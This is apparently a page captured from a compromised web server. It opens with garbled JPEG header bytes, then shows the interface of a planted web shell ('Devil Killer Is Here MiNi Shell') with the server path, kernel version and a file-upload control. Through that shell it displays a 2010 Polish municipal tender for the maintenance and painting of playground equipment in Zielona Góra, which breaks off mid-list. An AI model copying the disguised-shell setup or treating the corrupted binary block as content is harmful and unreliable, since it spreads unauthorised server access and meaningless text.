JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100204/31398-N-2010.html

<p class="kh_header"><b>Zielona Góra: Przeglądy, naprawa, konserwacja  i malowanie urządzeń zabawowych na komunalnych placach zabaw na terenie Miasta Zielona Góra.</b><br>
<b>Numer ogłoszenia: 31398 - 2010; data zamieszczenia: 04.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta , ul. Podgórna 22, 65-424 Zielona Góra, woj. lubuskie, tel. 0684564100,4564406 do 08, faks 068 4564155, 4564455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zielona-gora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeglądy, naprawa, konserwacja  i malowanie urządzeń zabawowych na komunalnych placach zabaw na terenie Miasta Zielona Góra..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przegląd, naprawa, konserwacja i malowanie urządzeń zabawowych na komunalnych placach zabaw.
1.1. Wykonawca powinien spełniać wymagania określone w PN-EN 1176-7 w kwestii dysponowania pracownikami z odpowiednimi uprawnieniami do sprawdzania i konserwacji urządzeń zabawowych.
1.2.Wykonawca ma obowiązek wykonywać zobowiązania umowne, czyli:
1)	przeprowadzić jedną kontrolę podstawową - pierwszą kontrolę rozpoczynającą prace objęte przedmiotem zamówienia, polegającą na ocenieniu ogólnego poziomu bezpieczeństwa wyposażenia, stanu fundamentów i nawierzchni, śladów rozkładu i/lub korozji oraz możliwych zmian w poziomie bezpieczeństwa, która będzie podstawą do likwidacji urządzeń zabawowych, które po przerwie zimowej stanowią niebezpieczeństwo dla zdrowia lub życia ich użytkowników ;
2)	przeprowadzać regularne kontrole funkcjonalne - minimum raz na dwa tygodnie - których celem jest ujawnienie rzeczywistych zagrożeń mogących być wynikiem wandalizmu, zużycia lub warunków pogodowych oraz sprawdzenie funkcjonowania i stabilności sprzętu i jego zużycia ;
3)	prowadzić dokumentację z przeprowadzanych kontroli (wzory zostaną przekazane Wykonawcy przez Zamawiającego w dniu podpisania umowy), które podlegają zatwierdzeniu przez Zamawiającego ;
4)	impregnować/konserwować i malować konstrukcje lub urządzenia oraz grodzenia placów zabaw;
5)	remontować na bieżąco grodzenia placów zabaw ;
6)	w ramach przeprowadzanych kontroli wykonywać drobne czynności i naprawy nie wymagające zakupu części zamiennych (np. zamocowywanie poluzowanych desek, smarowanie urządzeń, dokręcanie obluzowanych wkrętów, śrub, nakrętek, regulowanie naciągu lin) ;
7)	niezwłocznie i trwale wyłączać z eksploatacji zdewastowane lub wyeksploatowane urządzenia zabawowe i/lub elementy małej architektury (ławki, kosze na śmieci), stwarzające zagrożenie dla zdrowia i życia użytkowników ;
8)	wymienić jednokrotnie piasek we wszystkich podanych w pkt. 3.1.7 SIWZ piaskownicach                  na przełomie miesięcy marzec/kwiecień (termin do ustalenia po kontakcie telefonicznym                        z Zamawiającym) ;
9)	od chwili wymiany piasku w piaskownicach do końca miesiąca października, w terminach uzgodnionych z Zamawiającym, przeprowadzać dezynfekcję piasku w piaskownicach oraz na placach zabaw z nawierzchnią piaszczystą (podanych w pkt. 3.1.8 SIWZ) preparatem zabijającym larwy much i innych insektów znajdujących się w piasku piaskownic, zapobiegającym zanieczyszczaniu przez odchody psów i kotów oraz odstraszającym ww. zwierzęta od załatwiania swoich potrzeb fizjologicznych w piaskownicach, o działaniu natychmiastowym i nieszkodliwym dla użytkowników piaskownic (dzieci).
1.3.	Wykonawca winien dysponować:
1)	pomieszczeniem magazynowym przystosowanym do przechowywania zdemontowanych urządzeń zabawowych, których części składowe nadają się do dalszej eksploatacji;
1.4.	Całkowita odpowiedzialność za stan techniczny urządzeń zabawowo-sportowych, jak również wynikłe z tego tytułu szkody (również zaistniałe wypadki) spoczywa na Wykonawcy. 
1.5.	Zakres prac objętych zamówieniem i składniki ceny jednostkowej:
1)	Kontrola podstawowa - kontrola szczegółowa rozpoczynająca prace objęte umową, (nie później niż 14 dni po podpisaniu umowy) której zadaniem jest ocena ogólnego poziomu bezpieczeństwa wyposażenia, stanu fundamentów i nawierzchni, śladów rozkładu i , lub korozji oraz możliwych zmian w poziomie bezpieczeństwa, która będzie podstawą do likwidacji urządzeń zabawowych, które po przerwie zimowej stanowią niebezpieczeństwo dla zdrowia lub życia ich użytkowników;
2)	Regularne kontrole funkcjonalne - kontrole wykonywane minimum dwa razy w miesiącu, których zadaniem jest ocena stanu technicznego wszystkich urządzeń zabawowo-sportowych pod kątem bezpieczeństwa dla użytkowników oraz:
a.	bieżące usuwanie usterek i drobnych aktów wandalizmu, nie wymagających zakupu części zamiennych (uzupełnianie połączeń śrubowych, wymiana opon w siedziskach, demontaż zniszczonych elementów, itp.) ;
b.	sprawdzanie stabilności konstrukcji wszystkich urządzeń zabawowo-sportowych i ich poszczególnych elementów ;
c.	sprawdzanie olinowania na wszystkich urządzeniach linowych ;
d.	sprawdzanie działania części ruchomych wszystkich urządzeń zabawowo-sportowych i ich bieżąca konserwacja ;
e.	bieżąca konserwacja i remonty istniejących drewnianych i metalowych grodzeń placów zabaw ;
f.	zgłaszanie Zamawiającemu zauważonych nieprawidłowości, które wymagają nakładów na zakup i montaż nowych elementów wraz ze wstępnym określeniem wartości tych prac ;
g.	niezwłocznie i trwale wyłączanie z eksploatacji zdewastowanych lub wyeksploatowanych urządzeń zabawowych i, lub elementów małej architektury (ławki, kosze na śmieci), stwarzające zagrożenie dla zdrowia i życia użytkowników.
1.5.1 W cenie jednostkowej (średni miesięczny koszt realizacji zadania) należy uwzględnić:
a.       koszt pracy pracowników, 
b.       koszty transportu do objazdu placów zabaw.
3)	Konserwacja urządzeń zabawowo-sportowych znajdujących się na placach zabaw wymienionych w wykazie podanym w pkt. 3.1.6 SIWZ przedmiotu zamówienia:
a.	demontaż drewnianych urządzeń zabawowo-sportowych nie nadających się do dalszego użytkowania przez dzieci ze względów bhp ;
          w cenie należy uwzględnić:
	koszt pracy pracownika ;
	koszt usunięcia urządzenia wraz z ewentualnym fundamentem w ziemi ;
	koszt wyrównania terenu po usunięciu urządzenia zabawowego ;
	koszt transportu i przyjęcia odpadów na wysypisko śmieci;
b.	demontaż metalowych urządzeń zabawowo-sportowych nie nadających się do dalszego użytkowania przez dzieci z powodu nie spełniania norm bhp ;
          w cenie należy uwzględnić :
	koszt pracy pracownika ;
	koszt usunięcia urządzenia wraz z betonowym fundamentem, znajdującym się w ziemi ;
	koszt wyrównania terenu po usunięciu urządzenia zabawowego ;
	koszt transportu i przyjęcia odpadów na wysypisko śmieci ;
c.	likwidacja betonowych piaskownic zbudowanych z elementów betonowych (np. z krawężników) ;
          w cenie należy uwzględnić :
	koszt pracy pracownika ;
	koszt usunięcia betonowych elementów piaskownicy wraz z betonowym fundamentem, znajdującym się w ziemi ;
	koszt wyrównania terenu po usunięciu urządzenia zabawowego ;
	koszt transportu i przyjęcia odpadów na wysypisko śmieci ;
d.	likwidacja drewnianych piaskownic
           w cenie należy uwzględnić:
	koszty pracy pracownika ;
	koszt wyrównania terenu po usunięciu urządzenia zabawowego ;
	koszt transportu i przyjęcia odpadów na wysypisko śmieci ;
e.	zakup i montaż nowych piaskownic - piaskownice prostokątne ze sklejki o boku 2,4 m, z nakładkami z tworzywa sztucznego, zabezpieczającymi rogi piaskownicy wraz z piaskiem w ilości 3 m3 ;
          w cenie należy uwzględnić:
	koszt zakupu piaskownicy i jej montaż w terenie ;
	koszt zakupu i dowozu piasku do piaskownicy ;
f.	dwukrotne malowanie drewnochronem drewnianych elementów urządzeń zabawowo-sportowych ;
          w cenie należy uwzględnić:
	koszt pracy pracownika ;
	koszt zakupu drewnochronu ;
	koszt zakupu innych niezbędnych materiałów (np. pędzle) ;
g.	dwukrotne malowanie metalowych urządzeń zabawowo-sportowych farbą dwuskładnikową                 ze środkiem antykorozyjnym ;
w cenie należy uwzględnić:
	koszt pracy pracownika ;
	koszt zakupu dwuskładnikowej farby ;
	koszt zakupu innych niezbędnych materiałów (np. pędzle).
4)	Wywóz piasku z piaskownic na miejskie wysypisko śmieci - oraz dowóz nowego piasku,                  w miejsce wybranego.
w cenie należy uwzględnić:
	koszty wyboru starego piasku - warstwa 25 cm ;
	koszty wywozu na wysypisko ;
	koszty zakupu nowego piasku - warstwa 25 cm ;
	koszty transportu, koniecznego do wykonania zadania.
5)	Dezynfekcja piasku w piaskownicach (pkt. 3.1.7 SIWZ) oraz na powierzchniach piaszczystych komunalnych placów zabaw (pkt. 3.1.8.SIWZ).
w cenie należy uwzględnić:
	koszt pracy pracownika ;
	koszt zakupu preparatu określonego w pkt. 3.1.2.9) SIWZ.
6)	Systematyczne, comiesięczne wykonywanie kosztorysów z wykonanych robót wraz z wystawieniem faktur.
1.6.	Wykaz i lokalizacja komunalnych placów zabaw (zgodnie z załączonymi mapkami sytuacyjnymi stanowiącymi załącznik nr 11 do SIWZ):
1)	Osiedle za Auchan
	ul. Batorego 170
2)	Osiedle Zastalowskie
	ul. Strumykowa - między blokami nr 27-29-31
3)	Osiedle Dolina Zielona
	ul. Skłodowskiej 1a
	ul. Skłodowskiej 7
	Wagmostaw
4)	Osiedle Zacisze
	ul. Objazdowa - visa vis ul. Łąkowej
5)	Osiedle Winnica
	ul. Westerplatte-Ułańska - działka nr 248/10
6)	Osiedle Tysiąclecia
	ul. Chrobrego 35-61
	ul. Westerplatte -Chopina - zaplecze OZLP - działka nr 255/7
	ul. Krzywoustego 1-3
	ul. Krzywoustego 7-9-11
	ul. Wyspiańskiego 26-28
	Park 1000-lecia
	ul. Wazów 20-22
7)	Osiedle Wazów
	ul. Wyspiańskiego 38-44
	ul. Wazów 72
	ul. Zamenhofa 21-25
	ul. Zamenhofa 40-46
	ul. Konicza 7-9
	ul. Konicza 11-13-15
	ul. Konicza 17-19-21
8)	Osiedle Przyjaźni
	ul. Malczewskiego - koło stacji Orlen
	ul. Francuska-Braci Gierymskich - ścieżka zdrowia w lesie komunalnym
	ul. Francuska 25-33
9)	Osiedle Łużyckie
	Park św. Trójcy
	Mrowisko
10)	Śródmieście
	Plac Słowiański
11)	Osiedle Braniborskie
	ul. Podgórna 71-83
	ul. Władysława IV 2-8
	ul. Władysława IV 16
	ul. Władysława IV 18
	ul. Władysława IV - za Mirą
12)	Osiedle Pomorskie
	osiedle Pomorskie - plac nr I
	osiedle Pomorskie - plac nr II
	osiedle Pomorskie - plac nr III
13)	Osiedle Śląskie
14)	Racula
15)	Osiedle Piastowskie
	ul. Anieli Krzywoń 1-3-5
	ul. Anieli Krzywoń 7-9-11
	ul. Anieli Krzywoń 19-21-23
	Park Piastowski - plac zabaw dla dzieci młodszych
	Park Piastowski - plac zabaw sportowych
	polana w Ogrodzie Botanicznym
	ul. Ptasia 42
	ul. Ptasia 41-43
	ul. Ptasia 40
	ul. Ptasia 38
	ul. Ptasia 36
	ul. Ptasia 33-35
	ul. Ptasia 29-31
	ul. Ptasia 21-23
	ul. Wyszyńskiego 8
	ul. Wyszyńskiego 10
16)	Osiedle Słoneczne
	ul. Sucharskiego 9
	ul. Sucharskiego 15
	ul. Sucharskiego 22
	ul. Sucharskiego 26
	ul. Sucharskiego 27
	ul. Wyszyńskiego 25
	ul. Okulickiego - zaplecze posterunku policji
	ul. Wypoczynek 11-16
	ul. Wiśniowa 32-44
	ul. Ptasia 1-3
	ul. Ptasia 9-11
	ul. Ptasia 4-30
	ul. Krasickiego 1-7
	ul. Krasickiego 6
	ul. Krasickiego 9-15
	ul. Krasickiego 10
	ul. Krasickiego 17-23
	ul. Krasickiego 27-33
	ul. Krasickiego 35-41
	ul. Jaskółcza 13-15
	ul. Jaskółcza 23
	skwer Ogrodowa/Jaskółcza
	ul. Ogrodowa 3
	ul. Sikorskiego 39
	ul. Długa 8-18-Wesoła 1-7 - plac zabaw dla dzieci młodszych
	ul. Długa 8-18 Wesoła 1-7 - ścieżka zdrowia
	ul. Długa 28-30
17)	Osiedle Morelowa
	Park Sowińskiego - plac drewniany koło greckiej restauracji
	Park Sowińskiego - plac metalowy na wylocie do ul. Strzeleckiej
	ul. Sowińskiego-Strzelecka - wnęka podwórkowa
	ul. Partyzantów 14-38
18)	Osiedle Kilińskiego
	ul. Kożuchowska 1-3
19)	Osiedle Słowackiego
	ul. Kordiana
	ul. Lechitów - ścieżka zdrowia w lesie komunalnym 
	ul. Lechitów - działki pod lasem
20)	Osiedle Jędrzychów
	ul. Jędrzychowska - prawa strona na wyjeździe z miasta, przed pętlą autobusową
1.7.	Wykaz  piaskownic  znajdujących  się  na  stanie  komunalnych  placów  zabaw:
1)	OSIEDLE AUCHAN
	ul. Batorego 170
2)	OSIEDLE ZASTALOWSKIE
	ul. Strumykowa
3)	OSIEDLE DOLINA ZIELONA
	ul. Skłodowskiej 1a
	ul. Skłodowskiej 7
	Wagmostaw
4)	OSIEDLE ZACISZE
	ul. Objazdowa
5)	OSIEDLE WINNICA
	ul. Westerplatte/Ułańska
6)	OSIEDLE 10000-LECIA
	ul. Chrobrego 35-61
	ul. Westerplatte- Chopina - zaplecze OZLP
	ul. ul. Krzywoustego 1-3-5
	ul. Wyspiańskiego 26-28
	ul. Park 1000-lecia
	ul. Wazów 20-22
7)	OSIEDLE WAZÓW
	ul. Wyspiańskiego 38-44
	ul. Wazów 72
	ul. Zamenhofa 21-25
	ul. Zamenhofa 40-46
	ul. Konicza 7-9
	ul. Konicza 11-13-15
	ul. Konicza 17-19-21
8)	OSIEDLE PRZYJAŹNI
	ul. Malczewskiego
	ul. Francuska 25-33
9)	OSIEDLE ŁUŻYCKIE
	Park św. Trójcy
	mrowisko
10)	ŚRÓDMIEŚCIE
	Plac Słowiański
11)	OSIEDLE BRANIBORSKIE
	ul. Podgórna 71-83
	ul. Władysława IV 2-8
	ul.  Władysława IV 16
	ul. Władysława IV 18
12)	OSIEDLE POMORSKIE
	III plac
13)	OSIEDLE PIASTOWSKIE
               ul Anieli Krzywoń 1-3-5
	ul. Anieli Krzywoń 7-9-11
	ul. Anieli Krzywoń 19-21-23
	Park Piastowski - zabawa
	polana w Ogrodzie Botanicznym
	ul. Ptasia 41-43
	ul Ptasia 40
	ul. Ptasia 38
	ul. Ptasia 36
	ul. Ptasia 33-35
	ul. Ptasia 29-31
	ul. Ptasia 21-23
	ul. Wyszyńskiego 8
	ul. Wyszyńskiego 10
14)	OSIEDLE SŁONECZNE
	ul. Sucharskiego 9
	ul. Sucharskiego 15
	ul. Sucharskiego 22
	ul. Sucharskiego 26
	ul. Sucharskiego 27
	ul. Wyszyńskiego 25
	ul. Wypoczynek 11-16
	ul. Ptasia 4-30
	ul. Krasickiego 1-7
	ul. Krasickiego 6
	ul. Krasickiego 10
	ul. Krasickiego 9-15
	ul. Krasickiego 17-23
	ul. Krasickiego 27-33
	ul. Krasickiego 35-41
	ul. Jaskółcza 23
	ul. Jaskółcza 13-15
	 ul. Długa 8-18-Wesoła 1-7 - zabawa
15)	OSIEDLE MORELOWA
	Park Sowińskiego - plac drewniany
	Park Sowińskiego - plac metalowy
	ul. Sowińskiego/Strzelecka
16)	OSIEDLE SŁOWACKIEGO
	ul. Kordiana
	ul. Lechitów - działki
17)	OSIEDLE JĘDRZYCHÓW
	ul. Jędrzychowska
1.8.	Wykaz  komunalnych  placów  zabaw  z  nawierzchnią  piaszczystą:
1)	   Park św. Trójcy
2)	Park Sowińskiego
3)	Park 1000-lecia
4)	ul. Westerplatte-Chopina
5)	polana w Ogrodzie Botanicznym
6)	skwer Ogrodowa-Jaskółcza
7)	ul. Batorego 170
1.9.	Wykaz placów zabaw z grodzeniami :
1)	Park św. Trójcy (drewniane)
2)	Park Sowińskiego (drewniane)
3)	Park 1000-lecia (drewniane)
4)	ul. Westerplatte-Chopina (metalowe)
5)	polana w Ogrodzie Botanicznym (drewniane)
6)	skwer Ogrodowa-Jaskółcza (metalowe)
1.10 Inne zalecenia i zastrzeżenia:
Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej a także zdobył na swoją odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne                       do przygotowania oferty oraz zawarcia przyszłej umowy i wykonania zamówienia.  
2.2.	Zamawiający dopuszcza możliwość zlecenia Podwykonawcom wykonania części zamówienia publicznego (demontaż urządzeń drewnianych i lub metalowych, malowanie urządzeń drewnianych i lub metalowych, likwidacja drewnianych i lub betonowych piaskownic, dezynfekcja piaskownic i powierzchni piaszczystych, wywóz i dowóz piasku do piaskownic). 
          Zamawiający nie dopuszcza możliwości zlecenia Podwykonawcom wykonania części zamówienia publicznego w zakresie systematycznych kontroli placów zabaw oraz usuwania uszkodzeń urządzeń zabawowych ze względu na specyfikę przedmiotu zamówienia,                      tj.: Ponoszenie pełnej odpowiedzialności (polisa OC kontraktowa na wartość zadania z zakresu szkód powstałych w wyniku niewykonania lub nienależytego wykonania zobowiązania przez Wykonawcę dostarczona dla Zamawiającego przed podpisaniem umowy) za fachowe i należyte wykonanie przeglądów technicznych urządzeń zabawowych oraz usuwania uszkodzeń ww urządzeń zabawowych na komunalnych placach zabaw .
2.3.	Wyłoniony Wykonawca zobowiązany jest dostarczyć Zamawiającemu do dnia podpisania umowy:
1)	kopię aktualnej polisy OC deliktowej w zakresie prowadzonej działalności gospodarczej z rozszerzeniem o OC kontraktowe na łączną kwotę minimalną 500 000,00 zł  oraz zobowiązuje się do przedłużenia terminu ważności w/w polisy do końca trwania robót objętych niniejszą umową w przypadku gdy umowa wygasa przed końcem zakończenia prac;
2)	w przypadku gdy Wykonawca będzie wykonywał prace wyszczególnione w kosztorysie ofertowym przez Podwykonawców, OC deliktowe poszerzone o odpowiedzialność za podwykonawców;
3)	kopię uprawnień pracownika do nadzorowania robót konstrukcyjno-budowlanych                                     w ograniczonym zakresie, potwierdzone przynależnością do właściwej izby samorządu zawodowego ;
4)	potwierdzenia gotowości przyjęcia odpadów na wysypisko śmieci.
2.4.	Zamawiający załącza wykaz odpadów komunalnych do potwierdzenia gotowości przyjęcia odpadów na wysypisko odpadów stanowiący załącznik nr 10 do SIWZ.
2.5.	Wykonawca udziela rocznej gwarancji na wykonane naprawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.87.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 6.000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 1 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
1) są uprawnieni do wykonywania działalności w zakresie transportu odpadów.
Ocena spełniania warunków udziału w postępowaniu  zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach zgodnie z pkt. 6.1.3) , 6.1.5) oraz 6.1.9) SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 2 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
1). posiadają wiedzę i doświadczenie w realizacji w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,             co najmniej trzech zadań o minimalnej wartości 150.000 zł brutto każde w zakresie napraw lub remontów urządzeń zabawowych, sportowych lub rekreacyjnych, udokumentowane, że zostały wykonane lub są wykonywane należycie (Zamawiający nie dopuszcza sumowania zadań celem uzyskania wymaganego warunku kwotowego); .
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach zgodnie z pkt. 6.1.3) oraz 6.1.6) SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
1) dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć                                 w wykonywaniu zamówienia, posiadającymi zgodnie z ustawą z dnia z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 - tekst jednolity z późn. zm.) uprawnienia do kierowania robotami budowlanymi lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów  w specjalności:
1)	konstrukcyjno- budowlanej w ograniczonym zakresie potwierdzone aktualnym zaświadczeniem wydanym przez właściwą izbę samorządu zawodowego.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach zgodnie z pkt 6.1.3) oraz 6.1.7)-6.1.8) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
